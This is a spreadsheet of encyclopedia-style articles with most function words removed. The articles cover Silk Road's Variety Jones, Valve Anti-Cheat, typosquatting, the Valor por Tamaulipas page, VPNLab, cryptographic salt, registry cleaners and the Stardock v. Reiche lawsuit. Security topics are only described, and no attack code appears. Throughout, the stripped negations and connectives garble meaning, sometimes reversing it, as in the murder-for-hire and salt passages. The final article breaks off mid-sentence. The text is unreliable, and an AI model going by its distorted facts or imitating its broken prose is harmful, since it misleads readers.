    <t>variety jones (aka cimon) smedley (smed) charger pseudonyms individuals reported closely involved founding darknet market silk road. involvement according security researcher runa sandvik, variety jones joined silk road 2011 marijuana seed vendor, opposed drugs. working closely ross ulbricht, penetration tester, financial advisor mentor, person suggested "dread pirate roberts" title ulbricht used. according seized chat logs, jones also suggest first alleged murder hire, though actually take place.smedley joined site coder following gawker user influx relatively highly paid employee. unfinished projects included encrypted email system "silk mail" prospective financial internet projects. times appeared smedley reported directly jones. identities research individual's identities conducted tracking blockchain bitcoin transactions, confidential sources, rare thai marijuana seeds rationalisation aliases. consequently, suggested smedley's true identity could mike wattier, u.s. developer living thailand. variety jones could roger thomas clark, canadian also living thailand. december 2015, clark arrested thailand faced extradition united states. detainment extradition nearly year arrest detainment thailand, clark claimed "top secret information" intelligence officials close prayuth chan-o-cha, prime minister thailand's military government. while fighting extradition thailand, slept concrete floor, clark maintained knowledge corrupt agent involved silk road.clark extradited united states june 2018. charged narcotics trafficking conspiracy; narcotics trafficking; distributing narcotics means internet; conspiracy commit, abet, computer hacking conspiracy; conspiracy traffic fraudulent identification documents; money laundering conspiracy. january 2020, clark pleaded guilty conspiring distribute narcotics. facing maximum years prison, sentencing scheduled references</t>
  </si>
  <si>
    <t>Valve Anti-Cheat</t>
  </si>
  <si>
    <t>valve anti-cheat (vac) anti-cheat software product developed valve component steam platform, first released counter-strike 2002. when software detects cheat player's system, future, possibly days weeks original detection. kick players game detects errors system's memory hardware. information date detection type cheat detected disclosed player. after player notified, access online "vac protected" servers game player cheated permanently revoked additional restrictions applied player's steam account. during week november 2006, system detected 10,000 cheating attempts.during month december 2018 600,000 accounts banned. history 2001, even balance inc., developers anti-cheat software punkbuster designed counter-strike half-life mods, stopped supporting games support valve. valve also rejected business offers integrating technology directly games.valve started working "long-term solution" cheating 2001. vac's initial release counter-strike 2002. during initial release, system banned players hours. duration increased time; players banned year years, vac2 released 2005, bans became permanent. vac2 announced february 2005 began beta testing following month. november 2006, announced "new [vac] technology" caught "over 10,000" cheating attempts preceding week alone.during early testing phase 2002, information revealed program half-life dedicated server mailing lists. detect versions "ogc's opengl hack", detect opengl cheats, also detects changers cheats. information detected cheaters sent list server address 205.158.143.67 port 27013, later changed 27011. there also "master list" server. ram/hardware errors detected kick player server, them.eric smith nick shaffner original contacts game administrators. february 2010, team consisted steam's lead engineer john cook team engineers. july 2010, several players successfully used information leaked valve increase chances finding rare team fortress weapon called golden wrench banned vac. during month, approximately 12,000 owners call duty: modern warfare banned steam updated file disk loaded memory game, causing false positive detection. these bans revoked affected received free copy left dead extra copy send gift.in february 2014, rumors spread system monitoring websites users visited accessing cache. gabe newell responded reddit, clarifying purpose check secondary counter-measure detect kernel level cheats, affected fewer 0.1% clients checked resulted bans.as 2016, system began banning accounts registered phone number. additionally, phone number used account time banned allowed re-registered accounts three months. system criticized failing detect lmaobox, popular cheat program team fortress 2016, resulted wave bans.in february 2017, valve announced plans introduce machine-learning approach detecting cheats counter-strike: global offensive, initial version system already place, would automatically mark players manual detection players "overwatch" system.in march 2018, valve publicized said machine-learning based approach talk games developer conference, naming vacnet. design valve rarely discusses software, help cheaters write code conduct social engineering.the software sends client challenges machine; appropriate response received, flagged possible violation. uses signature scanning detect possible cheats scanning computer's memory processes. whenever anomaly detected, incident report created compared database banned applications and/or analyzed valve engineers. engineers inspect code copies game. code confirmed cheat, added database cheat codes.according steam's lead engineer john cook, stop anti-cheat software exploited, "the software constantly updated sent small portions servers needed, hackers small portions running particular time. able work around pieces never hack everything."valve also accepts submissions cheat programs cheat websites players email. players also report players suspect cheating steam community profile, although players banned reports alone.if cheat found, player's steam account flagged cheating immediately, player receive indication detection. delay "days even weeks" account permanently banned "vac secure" servers game, possibly along games engine (e.g. valve's source games, goldsrc games, unreal engine games). valve never discloses cheat detected. players criticized system taking weeks months cheaters.large numbers flagged accounts also banned "waves" “vac waves”. additional restrictions players banned face additional restrictions. steam family sharing allows users share video game library another steam user download play, games player banned cannot shared. user shares games another user, cheats fraud detected recipients account, original owner games shared banned sharing function revoked. banned users also cannot contribute steam translation server project, allows users contribute translations steam games. users banned game allowed refund it.over games support vac; players banned following games face additional restrictions: mods based games inherit support host game. denotes goldsrc games, player banned games banned them. denotes source engine games, player banned games banned them.# denotes games stricter policy servers protected, additionally bans players editing game files except config files.§ denotes games face digital goods restrictions revocation. social impact user's steam profile also marked "ban(s) record", publicly visible cannot hidden, regardless profile visibility banned account. bans become hidden users seven years getting another ban. analysis 43,465 users banned april 2011 october 2011 showed banned players user friends with, likely also banned future. after banned, lost friends, likely increase privacy settings also banned friends non-banned players. banned players also sometimes referred going "vacation".banned players also excluded competing electronic sports tournaments. 2014, professional player joel "emilio" mako banned live stream; initially denied using cheat, claiming caused friend played smurfing accounts mail linked main account" then 2015, admitted using cheat. hovik "kqly" tovmassian, simon "smn" beck gordon "sf" giry banned shortly scheduled play dreamhack winter 2014. esea league claimed bans result working valve directly. simon "smn" beck hovik "kqly" tovmassian admitted using cheats.in march 2020, elias "jamppi" olkkonen filed lawsuit valve, alleging lifetime negatively affected esports career, specifically inability play valve-sanctioned major tournaments, subsequently prevented signing onto esports team vac-ban tied account previously owned sold friend incurred ban; lawsuit alleges lifelong minor, particularly without ability first plead case, unreasonable.a users used collect bans, eventually made less prolific valve updated message shown user's profile, showing "multiple bans record" instead actual number bans. also cheating online games warden (software) references external links official discussion forum list valve anti-cheat (vac) enabled games</t>
  </si>
  <si>
    <t>Typosquatting</t>
  </si>
  <si>
    <t>typosquatting, also called hijacking, sting site, fake url, form cybersquatting, possibly brandjacking relies mistakes typos made internet users inputting website address browser. should user accidentally enter incorrect website address, (including alternative website owned cybersquatter).the typosquatter's usually five kinds, similar victim site address: common misspelling, foreign language spelling, intended site misspelling based typographical error plural singular domain name different top-level domain: (i.e. .com instead .org) abuse country code top-level domain (cctld) (.cm, .co, instead .com)similar abuses: combosquatting misspelling, appending arbitrary word appears legitimate, anyone could register. doppelganger domain omitting period inserting extra period appending terms sucks -suckes domain nameonce typosquatter's site, user also tricked thinking fact real site, copied similar logos, website layouts, content. spam emails sometimes make typosquatting urls trick users visiting malicious sites look like given bank's site, instance. motivation there several different reasons typosquatters buying typo domain: order sell typo domain back brand owner monetize domain advertising revenues direct navigation misspellings intended domain redirect typo-traffic competitor redirect typo-traffic back brand itself, affiliate link, thus earning commissions brand owner's affiliate program. phishing scheme mimic brand's site, intercepting passwords visitor enters unsuspectingly install drive-by malware revenue generating adware onto visitors' devices harvest misaddressed e-mail messages mistakenly sent typo domain express opinion different intended website's opinion legitimate site owners: block malevolent typo domain others examples many companies, including verizon, lufthansa, lego, garnered reputations aggressively chasing typosquatted names. lego, example, spent roughly us$500,000 taking cases udrp proceedings.celebrities also frequently pursued domain names. prominent examples include basketball player dirk nowitzki's udrp dirkswish.com actress longoria's udrp evalongoria.org.active since 2006, arguably famous example typosquatting goggle, typosquatted version google, subject mid-2000's safety promotion mcafee, showed large amounts malware installed drive-by downloads upon accessing site time. later (ca. 2011–2012) redirected google.com, 2018 check revealed redirect users adware pages, 2020 attempt access site private resolver hosted adguard resulted page identified malware blocked user's security. mid-2022, turned political blog. another example corporate typosquatting yuube.com, targeting youtube users programmed redirect malicious website page, asks users security check extension really malware. similarly, www.airfrance.com typosquatted www.arifrance.com, diverting users website peddling discount travel (although redirects warning airfrance malware). other examples equifacks.com (equifax.com), experianne.com (experian.com), tramsonion.com (transunion.com); three typosquatted sites registered comedian john oliver show last week tonight. over typosquats related 2020 presidential election detected according report 2019.users trying visit popular internet-based game agar.io misspell said agor.io. visiting site known produce jumpscare screamer popular creepypasta jeff killer, flashed rapidly produced loud noise. original site taken 2017, linked randomly-themed phishing websites. short-lived typo-squatter site called microaoft.com show looked like microsoft main site, would show false malware warnings urging users call them, likely cases tech support scam. microsoft shut site shortly 2021. united states united states, 1999 anticybersquatting consumer protection (acpa) contains clause (section 3(a), amending 1117 include sub-section (d)(2)(b)(ii)) aimed combatting typosquatting.however, april 2006, evangelist jerry falwell failed u.s. supreme court review decision allowing christopher lamparello www.fallwell.com. relying plausible misspelling falwell's name, lamparello's gripe site presents misdirected visitors scriptural references intended counter fundamentalist preacher's scathing rebukes homosexuality. lamparello falwell, high court stand 2005 fourth circuit finding "the mark domain name gripe site criticizing markholder constitute cybersquatting." wipo resolution procedure under uniform domain-name dispute-resolution policy (udrp), trademark holders file case world intellectual property organization (wipo) typosquatters cybersquatters general). complainant show registered domain name identical confusingly similar trademark, registrant legitimate interest domain name, domain name used faith. also damerau–levenshtein distance domain name system system identify resources network (dns) doppelganger domain form domain name hijack homograph attack visually similar letters domain names misdialed call toll-free numbers (for similar attacks vanity toll-free telephone number phonewords) mousetrapping phishing attempt trick person revealing information shortening technique references external links giles: typos earn google $500m year scientist, february 2010 (reporting research edelman tyler moore: measuring typosquatting perpetrators funders) "the internet commerce association code conduct". internetcommerce.org. retrieved 2007-09-13. internet commerce association's (ica) member code conduct expresses ica's recognition responsibilities members intellectual property, domain name, large internet communities guide members conducting domain name investment development activities professionalism, respect integrity. "the coalition against domain name abuse combat cybersquatting". complianceandprivacy.com. retrieved 2007-09-20. with growing ease profitability, sophisticated cybersquatters exploiting flaw domain name registration process whereby domain names registered subsequently dropped, risk free, within accepted 5-day grace period. "typosquatting". retrieved 2013-02-27. tool shows lots mistyped registered domains (german).</t>
  </si>
  <si>
    <t>Valor por Tamaulipas</t>
  </si>
  <si>
    <t>valor tamaulipas ("courage tamaulipas") facebook page covered security updates mexican state tamaulipas. founded anonymous user january 2012, goal share information social media users drug-related violence risk situations across state. with 515,000 likes facebook, valor tamaulipas routinely posted messages photos crime scenes page. country many journalists assassinated writing drug trafficking organized crime, page survives anonymity, immune threats. early 2013, mexican drug trafficking organization issued fliers offering reward $600,000 pesos (us$46,000) anyone could give information locate administrator valor tamaulipas family members. administrator, however, openly defied criminal organization's threat facebook. wife children reportedly fled united states threats security reasons, citizen journalist stated facebook page decided stay mexico continue updating valor tamaulipas. december 2014, however, administrator announced retirement social media. history facebook page valor tamaulipas ("courage tamaulipas") created anonymous user january 2012 getting inspiration websites anonymously reported drug violence mexico. page regularly posts messages photos crime scenes; goal report drug-related violence situations risk mexican state tamaulipas. frequently posts messages photos criminal activities state, including limited enforcement action, photos alleged criminals, vehicles reported extortionists, abandoned vehicles left roadside, roadblocks, arsons, theft activities, drug traffickers job, like.given high levels drug-related activities northern mexico tamaulipas, many facebook users also check valor tamaulipas verify shootout area, know part highway carjacking took place, someone reported missing. information found valor tamaulipas shared internet users themselves; administrator, hand, active almost hours throughout whole week. most mexican mainstream media outlets play violence fear reprisals country's criminal organizations. given censorship, valor tamaulipas popular outlet crime watchdogs concerned violence tamaulipas. according crime journalist james barger insight crime, information valor tamaulipas "spotty, sometimes unreliable, often source [is] happening". several internet users mexico, united states, countries around world shown support valor tamaulipas' work followed reports facebook and/or twitter.the page 210,000 likes facebook april 2013; twitter, valor tamaulipas approximately 24,400 followers. background state tamaulipas home transnational criminal organizations gulf cartel zetas fight control smuggling routes along texan border. this border area major route human trafficking, arms smuggling, international narcotics trade. gulf cartel, according united states department state, started 1930s bootlegging gang later transformed full-fledged drug trafficking organization 1980s. zetas, hand, formed late 1990s early 2000s former soldiers mexican army hired imprisoned osiel cárdenas guillén become gulf cartel's muscle. apparent power struggle, however, zetas gulf cartel broke relations early 2010 went state tamaulipas bordering states, prompting daily shootouts, kidnappings, mass slayings.mexico among dangerous countries planet practice journalism, particularly topics organized crime drug trafficking. since 2000, nearly journalists kidnapped killed throughout country; many killings, however, remain unsolved unpunished. high levels violence attacks press forced many local media outlets downplay coverage. result, many people turned social media outlets like valor tamaulipas hourly updates security atmosphere areas. social media reporting carries risks too; september 2011, journalist blogger maría elizabeth macías castro decapitated zetas posting organized crime activities personal blog. that month, alleged twitter users killed hanged bridge nuevo laredo, tamaulipas denouncing twitter.in january 2013, tamaulipas state homicide rate every 100,000 people; kidnappings extortion also widespread. organized crime threats june 2012, gulf cartel allegedly created facebook page called anti valor tamaulipas ("anti-courage tamaulipas"), intended counter goals page. stated information spread valor tamaulipas "[was] benefit community." early 2013, anti valor tamaulipas approximately 11,244 likes facebook.through several fliers issued ciudad victoria, tamaulipas, drug trafficking organization offered $600,000 peso (roughly us$46,000) reward anyone could give information whereabouts administrator valor tamaulipas, identify family members, whether parents, brothers sisters, children wife. flier included phone number (834)-104-7370, area code tamaulipas. administrator responded saying "[he was] playing hero, [and was] had] citizen." also thanked visitors contributed page gave support throughout project, asked mexican armed forces continue fight organized crime. administrator said, too, would continue crime reporting valor tamaulipas even might cost life. page administrator stated hearing threat, wife children left united states security reasons. also asked visitors refrain using personal facebook twitter accounts uploading information page since could risk. believes mexican criminal organization known zetas state officials working probably responsible threat.on february 2013, video released depicting supposed collaborator valor tamaulipas, kneeling hands pockets. beside masked, camouflaged firearm. supposed collaborator said calmly, "please refrain publishing information not, price pay." after kneeling warned internet users collaborating valor tamaulipas, gunman pulled trigger shot head, apparently killing man. administrator valor tamaulipas responded posting message facebook saying take stance authenticity video, stated recognize man. notinfomex blog website reported gulf cartel behind video, information authenticity officially confirmed.in april 2013, proceso magazine received information supposed informants office general prosecutor tamaulipas indicated state governor egidio torre cantú wanted close page discrediting false reports. governor, report said, concerned valor tamaulipas "had become news reference showed mexico world organized crime, him, controlled state."on 2013, valor tamaulipas released video sent page alleged organized crime group. video, woman interrogated alleged drug traffickers administrator close page reveal true identity. couple presented supposed family members administrator; however, later indicated family, criminal organization either confused simply targeted random family pressure administrator close page. valor tamaulipas responded sending message authorities tamaulipas blamed death person died cardiac arrest couple kidnapped; administrator also accused tamaulipas authorities protecting zetas drug cartel. closure renewal early morning april 2013, facebook twitter accounts valor tamaulipas shut unexpectedly without explanation. page name created administrators, said know happened original administrator wanted continue work nonetheless. this raised concerns actually working behind scenes keep page running. another page users similar name, responsabilidad tamaulipas ("responsibility tamaulipas"), posted page valor tamaulipas closed temporarily order improve page protect administrator. they advised online users ignore websites posed original page.about week later, original page valor tamaulipas reopened, administrator issued communiqué indicated page going close permanently days. facebook administrator explained could continue collaborating valor tamaulipas inability properly manage page. case, organized crime won, defeated society; defeated family, defeated thousands contributors trusted page reported despite fears", administrator said. also talked experience lessons learned head page, thanked supported trusted year. administrator concluded asking followers forgive him.in eight days following announcement, page operated normally did. after reconsidering several times, administrator decided keep maintaining page, thanked media followers supporting him. concluded saying, sure keeping page benefit people goodwill know irresponsible stubborn another note, confess honor pleasure continue collaborating working team you. thank you, people goodwill tamaulipas. you." block, reopen, threats june 2014, facebook page blocked month uploading gun-related posts, considered violation facebook's policies. order continue reporting, admin posted twitter google accounts.on october 2014, former co-admin sister page responsabilidad tamaulipas, maría rosario fuentes rubio (also known twitter account @miut3 felina), kidnapped, tortured, killed alleged organized crime members. strong follower-base twitter known posting risk situations, shootouts, information criminal groups tamaulipas. captors allegedly posted several tweets profile, prompting shocking reactions social media. first tweet revealed identity profession doctor, ended saying "life come end". minutes later, another tweet asked others make mistakes posting organized crime). third tweet warned valor tamaulipas twitter users, @bandolera7 @civilarmado_mx, posting risk situations. fourth final tweet said following: "close accounts, risk families did, forgiveness," included photos her. showed alive, second showed corpse splattered blood. twitter later deactivated account photos already leaked across social media.valor tamaulipas confirmed death facebook page lamented incident. admin stated @miut3 collaborator valor tamaulipas former admin responsabilidad tamaulipas. unknown murder linked activities social media profession doctor; version suggested kidnapped organized crime alleged drug lord died medical complications, captors discovered identity took phone decided threaten rest online community. valor tamaulipas believe version, however. admin said reasons believe @miut3 targeted online activities. valor tamaulipas stated @miut3 threatened twitter user @garzalaura142 week killed; admin indicated threats used similar wordings coincidence". admin's retirement management november 2014, admin page announced retirement facebook. stated leaving page personal reasons, valor tamaulipas would continue management. that person, said, relationship enforcement. admin believes would benefit cyber community would allow citizen reports reach enforcement directly. admin also announced pages responsabilidad, fortaleza, valor huasteca would management too. management would composed people deemed trustworthy given long history support suffered loss result violence. closing statement, farewell thanking bringing happiness personal professional life. comment section facebook post, many people thanked admin support. some them, however, expressed concerned administration given his/her relationship government. sister page similar projects valor tamaulipas sister page called esperanza tamaulipas ("hope tamaulipas"), uploads pictures people kidnapped reported disappeared state. page list people disappeared 2010 2012. other projects like valor michoacán ("courage michoacán risk situations"), reported drug-related violence role self-defense groups michoacán since 2013, many followers likes twitter (@valormichoacan) facebook (/valorpormichoacan). acronyms used page valor tamaulipas uses several acronyms posts facebook twitter: also mexican drug list journalists killed mexico sources footnotes references external links valor tamaulipas twitter valor tamaulipas youtube valor tamaulipas google+ valor tamaulipas facebook esperanza tamaulipas facebook (sister page) anti valor tamaulipas facebook (response page, allegedly organized crime)</t>
  </si>
  <si>
    <t>VPNLab</t>
  </si>
  <si>
    <t>vpnlab service catered cyber criminals. service shut europol january 2022. history vpnlab created 2008. service advertised servers multiple countries offered double encryption. service known providing services cyber criminals, specifically ransomware authors. site accepted variety payments, including webmoney bitcoin. "doublevpn" service offered $129 dollars year. owners advertised website dark web. raid shutdown january 2022, europol, along national enforcement agencies seized vpnlab's domain. january 2022, arrests made. along europol, (united states), central directorate judicial police (france), national crime agency (united kingdom) involved site raid. references</t>
  </si>
  <si>
    <t>Stacks blockchain</t>
  </si>
  <si>
    <t>stacks project, formerly blockstack, open-source platform build smart contracts decentralized blockchain applications. stacks blockchain connects bitcoin enable apps smart contracts. addition smart contracts, stacks project provides open-source software authentication, data storage. design concerns around internet privacy, security, data breaches brought attention stacks project. software developers used stacks software build decentralized alternatives popular services. stacks (stx) token native cryptocurrency stacks blockchain, used executing smart contracts processing transactions. history stacks project originally started muneeb ryan shea blockstack. became first qualified token offering 2019. blockstack pbc, company working stacks technology, raised around million venture capital token sales. main stacks blockchain launched 2021. applications citycoins citycoins project launched fungible tokens cities miami york city. september 2021, miami’s city commissioners voted accept protocol treasury, valued $21m time. miamicoin's value crashed, stacks donated $5.25 million city miami. references</t>
  </si>
  <si>
    <t>Salt (cryptography)</t>
  </si>
  <si>
    <t>cryptography, salt random data used additional input one-way function hashes data, password passphrase. salts used safeguard passwords storage. historically, cryptographic hash function password stored system, time, additional safeguards developed protect duplicate common passwords identifiable hashes identical). salting protection. salt randomly generated password. typically, salt password version stretching) concatenated cryptographic hash function, output hash value (but original password) stored salt database. hashing allows later authentication without keeping therefore risking exposure plaintext password authentication data store compromised. note this, salts need encrypted stored separately hashed password itself, even attacker access database hash values salts, correct said salts hinder common attacks.salts defend attacks precomputed tables (e.g. rainbow tables), make size table needed successful attack prohibitively large without burdening users. since salts differ another, also protect redundant (e.g. commonly used, re-used) passwords, different salted hashes created different instances password. cryptographic salts broadly used many modern computer systems, unix system credentials internet security. salts closely related concept cryptographic nonce. example usage here incomplete example salt value storing passwords. this first table username password combinations. password stored. salt value generated random length; case salt value bytes long. salt value appended plaintext password result hashed, referred hashed value. both salt value hashed value stored. table illustrates, different salt values create completely different hashed values, even plaintext passwords exactly same. additionally, dictionary attacks mitigated degree attacker cannot practically precompute hashes. however, salt cannot protect common easily guessed passwords. without salt, hashed value users given password, making easier hackers guess password hashed value: common mistakes salt re-use using salt passwords dangerous precomputed table simply accounts salt render salt useless. generation precomputed tables databases unique salts every password viable computational cost but, common salt used entries, creating table (that accounts salt) becomes viable possibly successful attack.because salt re-use cause users password hash, cracking single hash result passwords compromised too. short salt salt short, attacker precompute table every possible salt appended every likely password. using long salt ensures table would prohibitively large. benefits understand difference cracking single password them, consider file users hashed passwords. file unsalted. then attacker could pick string, call attempt[0], compute hash(attempt[0]). user whose hash stored file hash(attempt[0]) password attempt[0]. however, even attempt[0] user's actual password, accepted were, system check passwords computing hash password entered comparing hash stored file. thus, match cracks user password, chance match rises number passwords file. contrast, salts used, attacker would compute hash(attempt[0] salt[a]), compare entry hash(attempt[0] salt[b]), compare entry this prevents attempt cracking multiple passwords, given salt re-use avoided.salts also combat precomputed tables cracking passwords. such table might simply common passwords hashes, might something complex, like store start points precomputed hash chains. either case, salting defend precomputed tables lengthening hashes draw larger character sets, making less likely table covers resulting hashes. particular, precomputed table would need cover string [salt hash] rather simply [hash]. modern shadow password system, password hashes security data stored non-public file, somewhat mitigates concerns. however, remain relevant multi-server installations centralized password management systems push passwords password hashes multiple systems. installations, root account individual system treated less trusted administrators centralized password system, remains worthwhile ensure security password hashing algorithm, including generation unique salt values, adequate.another (lesser) benefit salt follows: users might choose string password, user might choose password machines. without salt, password would stored hash string password file. this would disclose fact accounts password, allowing anyone knows account's passwords access account. salting passwords random characters, even accounts password, discover reading hashes. unix implementations 1970s–1980s earlier versions unix used password file /etc/passwd store hashes salted passwords (passwords prefixed two-character random salts). older versions unix, salt also stored passwd file cleartext) together hash salted password. password file publicly readable users system. this necessary user-privileged software tools could find user names information. security passwords therefore protected one-way functions (enciphering hashing) used purpose. early unix implementations limited passwords eight characters used 12-bit salt, allowed 4,096 possible salt values. this appropriate balance 1970s computational storage costs. 1980s– shadow password system used limit access hashes salt. salt eight characters, hash characters, password length unlimited. web-application implementations common application store database hash value user's password. without salt, successful injection attack yield easily crackable passwords. because many users re-use passwords multiple sites, salt important component overall application security. some additional references using salt secure password hashes specific languages libraries (php, .net libraries, etc.) found external links section below. also password cracking cryptographic nonce initialization vector padding "spice" hasty pudding cipher rainbow tables pepper (cryptography) references external links wille, christoph (2004-01-05). "storing passwords done right!". owasp cryptographic cheat sheet encrypt user passwords</t>
  </si>
  <si>
    <t>Registry cleaner</t>
  </si>
  <si>
    <t>registry cleaner class third-party utility software designed microsoft windows operating system, whose purpose remove redundant items windows registry. registry cleaners supported microsoft, vendors registry cleaners claim useful repair inconsistencies arising manual changes applications, especially com-based programs. effectiveness registry cleaners controversial topic. issue clouded fact malware scareware often associated utilities type. advantages disadvantages sheer size complexity registry database, manually cleaning redundant invalid entries impractical, registry cleaners automate process looking invalid entries, missing file references broken links within registry resolving removing them. correction invalid registry provide benefits; voluminous usually quite harmless, obsolete records linked com-based applications whose associated files longer present. registry damage some registry cleaners make distinction severity errors, many erroneously categorize errors "critical" little basis support removing changing certain registry data prevent system starting, cause application errors crashes. always possible third-party program know whether particular invalid redundant. poorly designed registry cleaner equipped know sure whether still used windows detrimental effects removing have. this lead loss functionality and/or system instability, well application compatibility updates microsoft block problematic registry cleaners. windows installer cleanup utility microsoft-supported utility addressing windows installer related issues. malware payloads registry cleaners used vehicle number trojan applications install malware, typically social engineering attacks website pop-up free downloads falsely report problems "rectified" purchasing downloading registry cleaner. worst breed products advertise encourage "free" registry scan; however, user typically finds product purchased substantial sum, effect anticipated "repairs". rogue security software "winfixer" including registry cleaners ranked prevalent pieces malware currently circulation. scanners scareware rogue registry cleaners often marketed alarmist advertisements falsely claim pre-analyzed displaying bogus warnings take "corrective" action; hence descriptive label "scareware". october 2008, microsoft washington attorney general filed lawsuit texas firms, branch software alpha red, producers "registry cleaner scareware. lawsuit alleges company sent incessant pop-ups resembling system warnings consumers' personal computers stating "critical error message! registry damaged corrupted", instructing users visit site download registry cleaner cost $39.95. metrics performance benefit windows computers, possible large registry could slow computer's start-up time. however less issue nt-based operating systems (including windows vista), different on-disk structure registry, improved memory management, indexing. furthermore, versions windows prior server 2003 fail start registry kernel files unable within first memory. slowdown registry bloat thus less issue modern versions windows. conversely, defragmenting underlying registry files (e.g. using free microsoft-supported pagedefrag tool), rather attempting clean registry contents, measurable benefit therefore recommended past experts mark russinovich. form defragmentation capability built directly windows since vista.) windows performance toolkit specifically designed troubleshoot performance-related issues windows, include registry cleaning optimizations. undeletable registry keys most registry cleaners cannot repair scenarios undeletable registry keys caused embedded null characters names; specialized tools regdelnull utility (part free sysinternals software) able this. recovery capability limitations registry cleaner cannot repair registry hive cannot mounted system, making repair "slave mounting" system disk impossible. corrupt registry recovered number ways supported microsoft (e.g. automated system recovery, "last known-good" boot menu, re-running setup using system restore). "last known-good" restores last system registry hive (containing driver service configuration) successfully booted system. malware removal these tools also difficult manage non-boot situation, infestation, compared full system restore backup. rapidly evolving malware, even full system restore unable remove rootkit hard drive. registry cleaners likewise designed malware removal, although minor side-effects repaired, turned-off system restore. however, complex scenarios malware spyware, adware, viruses involved, removal system-critical files result. application virtualization registry cleaner cleaning registry entries associated virtualised application since registry entries scenario written application-specific virtual registry instead real one. complications detailed interactions real-mode virtual also leaves potential incorrect removal shortcuts registry entries point "disappeared" files, consequent confusion user cleaner products. there little competent information specific interaction, integration. general, even registry cleaners could arguably considered safe normal end-user environment, avoided application virtualization environment. also utility software references</t>
  </si>
  <si>
    <t>Stardock Systems, Inc. v. Reiche</t>
  </si>
  <si>
    <t>stardock systems, inc. paul reiche robert frederick ford, 2018 7348858 (n.d. cal. dec. 2018), case united states district court northern district california applied american intellectual property contents sale computer games. paul reiche fred ford makers critically acclaimed 1990 star control game series, stardock maker 2018 release star control: origins. lawsuit stems dispute ownership, licensing, infringement star control intellectual property, including trademarks copyrights. 1990s, reiche ford licensed copyrights publisher accolade, create star control without involvement. that license expired early 2000s games stopped sold, allowing reiche ford re-release assets open source ur-quan masters. around time, accolade star control trademark acquired atari years later, stardock purchased atari's star control assets 2013 bankruptcy auction, began developing origins game. late 2017, stardock's disagreement reiche ford escalated towards legal battle, party asserting violating intellectual property rights: stardock selling original games steam without reiche ford's consent, whereas reiche ford announced ghosts precursors sequel star control without stardock's consent. after stardock filed lawsuit december 2017, dispute escalated include contents games, reiche ford counter-claiming stardock misappropriated characters designs origins, stardock claiming ownership trademarks aliens original star control games. late 2018, stardock applied injunctive relief protect origins digital milllennium copyright takedown notice, denied judge saundra brown armstrong. reiche ford issued uncontested notice soon after, steam gog.com removed games stores. soon after, stardock agreed indemnify digital sales platforms litigation, restored origins sale. june 2019, parties came mutual settlement agreement. stardock would star control trademark, drop claims alien names original series. reiche ford would copyrights star control parties would avoid using characters stories might infringe other's separate games. reiche ford agreed refrain announcements ghosts precursors years, would renamed part agreement. intellectual property history original star control series star control star control created paul reiche fred ford published accolade. released 1990 1992 respectively, games received numerous awards. journalists listed star control among best games time, star control earning even "best game" rankings 1990s, 2000s, 2010s. also ranked among best games several creative areas, including writing, world design, character design, music. star control ford reiche's first collaboration. sequel ambitious, forcing creative friends help, forcing ford financially support team production went schedule. accolade asked ford reiche make third game budget, turned pursue projects. reiche ford held copyrights first star control games, accolade licensed reiche ford's designs make star control different team. released 1996, star control enjoy acclaimed legacy first games, reviewers noting change authorship. accolade's plans fourth star control game ultimately cancelled development, fans continued demand star control game well late 2000s. separation rights early 2000s, accolade's publishing agreement reiche ford expired. this triggered contractual clause games longer generating royalties, allowing copyrighted content revert reiche ford. games longer available stores, reiche ford wanted keep work public eye, maintain audience potential sequel. reiche ford still owned copyrights star control could successfully purchase star control trademark, leading consider title potential follow-up. this remake star control ur-quan masters, released 2002 free download open source copyright license. official free release prevented game becoming abandonware.meanwhile, star control trademark transferred infogrames entertainment. this happened star control publisher accolade sold company infogrames 1999, merged atari re-branded atari name 2003. 2011, gog.com began selling star control re-release digital store. ford contacted sales platform, saying could sell games without permission, leading gog.com separately license star control trademark atari, games reiche ford.atari declared bankruptcy 2013, assets listed auction. stardock became bidder atari's star control intellectual property. upon hearing news, paul reiche indicated still owned copyright original star control games, stardock must purchased star control trademark, confirmed stardock. indeed, atari asset purchase agreement listed assets sold stardock: star control trademark star control copyright. stardock began developing star control game, re-iterated acquire copyright first games, would need license reiche ford content lore. reiche ford echoed understanding 2015 game developer conference interview, stating stardock's game would star control trademark only. legal dispute facts september 2015, stardock announced game star control: origins would prequel star control. through email, stardock asked reiche ford license character designs, repeatedly declined. 2016, stardock described origins alternative timeline star control multiverse, none older games' characters, avoid infringing reiche ford's copyrighted lore. despite stardock's continued offers, reiche ford declined collaborate origins, citing desire create sequel finished ongoing projects activision.in october 2017, stardock began selling older star control games steam store, promotion origins. through email, parties began dispute legal rights stardock purchased atari, whether included distribution rights original series. despite private negotiations, stardock declined stop selling games, leading reiche ford formally request steam remove original series store digital millennium copyright (dmca) takedown notice. stardock formally contested notice, sales continued. when reiche ford publicly announced consent stardock's sale original series, stardock announced purchased star control publishing rights atari, reiche ford responded atari's publishing rights lapsed atari's admission.also october, reiche ford announced ghosts precursors direct sequel star control initially, stardock supported announcement ghosts precursors "true sequel star control claimed origins game would take place alternate universe split original series' universe. december reiche ford announced stardock negotiated legal permissions, "our games’ universe absolutely connection, hyper-dimensional otherwise". responding allegations stardock threatened stop reiche ford releasing ghosts precursors, stardock announced lawyers would handle dispute. trademark claim december 2017, stardock filed lawsuit reiche ford u.s. district court northern district california. stardock's main contention star control trademark infringed reiche ford announced ghosts precursors "direct sequel" star control stardock contended reiche ford creators star control, misleading consumers involvement series. months followed, stardock applied trademarks, filed amended claim march 2018 claim ownership them. these trademark applications included names alien races original star control, mark ur-quan masters. authorized united states patent trademark office, stardock's trademarks could effect preventing reiche ford using aliens game. when correspondence surfaced stardock planned ur-quan masters star control trademarks shut criticism games' forums, stardock brad wardell responded moment anger intention actually defense copyright counterclaim february 2018, reiche ford answered stardock's complaint asserting several defenses, well raising counterclaim stardock copyright infringement. reiche ford argued ghosts precursors announcement infringe stardock's trademark, suggested atari's trademark renewal invalid given star control used trade several years. reiche ford also counterclaimed stardock liable copyright infringement stardock's unauthorized characters designs star control unauthorized sale original games. reiche ford pointed stardock valid copyright distribution rights because, original contract, accolade lost rights 2001 ceased sell games stores. reiche ford also represented never authorized atari stardock distribute games, authorize gog.com. reiche ford contested stardock's claim ur-quan masters trademark, alleged stardock misled customers duo's involvement origins. settlement discussions march 2018, reiche ford described alleged settlement offer made stardock, asking reiche ford compensate stardock us$225,000 damages, assign star control intellectual property stardock, refrain making game genre stardock five years. reiche ford rejected settlement "unfathomable". stardock responded misrepresented terms confidential settlement offer, leading reiche ford publish settlement offer publicly. week later, court ordered parties keep settlement negotiations confidential. reiche ford 